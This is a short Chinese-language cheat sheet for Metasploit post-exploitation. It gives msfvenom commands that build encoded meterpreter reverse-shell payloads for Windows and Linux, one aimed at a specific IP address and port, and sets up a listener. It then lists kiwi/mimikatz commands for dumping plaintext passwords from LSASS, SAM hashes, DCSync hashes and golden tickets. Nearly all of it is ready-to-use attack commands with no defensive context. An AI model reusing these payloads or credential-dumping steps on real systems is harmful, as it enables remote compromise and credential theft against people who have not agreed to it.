监听反弹shell模块

exploit/multi/handler

生成木马模块

msfvenom

msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai  -f exe -o  new.exe -i 5
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=117.72.9.31 LPORT=777
7 -e x86/shikata_ga_nai  -f elf -o ma -i 5

kiwi模块

主要用来收集凭证

load kiwi
help kiwi
creds_all:             #列举所有凭据
creds_kerberos:        #列举所有kerberos凭据
creds_msv:             #列举所有msv凭据
creds_ssp:             #列举所有ssp凭据
creds_tspkg:           #列举所有tspkg凭据
creds_wdigest:         #列举所有wdigest凭据
dcsync:                #通过DCSync检索用户帐户信息
dcsync_ntlm:           #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:  #创建黄金票据
kerberos_ticket_list:  #列举kerberos票据
kerberos_ticket_purge: #清除kerberos票据
kerberos_ticket_use:   #使用kerberos票据
kiwi_cmd:              #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:          #dump出lsa的SAM
lsa_dump_secrets:      #dump出lsa的密文
password_change:       #修改密码
wifi_list:             #列出当前用户的wifi配置文件
wifi_list_shared:      #列出共享wifi配置文件/编码

kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令:

读取lsass进程信息

privilege::debug
sekurlsa::logonPasswords

kiwi_cmd sekurlsa::logonpasswords

读取SAM数据库获取用户Hash,获取系统所有本地用户Hash

privilege::debug
token::elevate
lsadump::sam

详细看内网渗透神器(Mimikatz)——使用教程-CSDN博客

注意

kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。

Untitled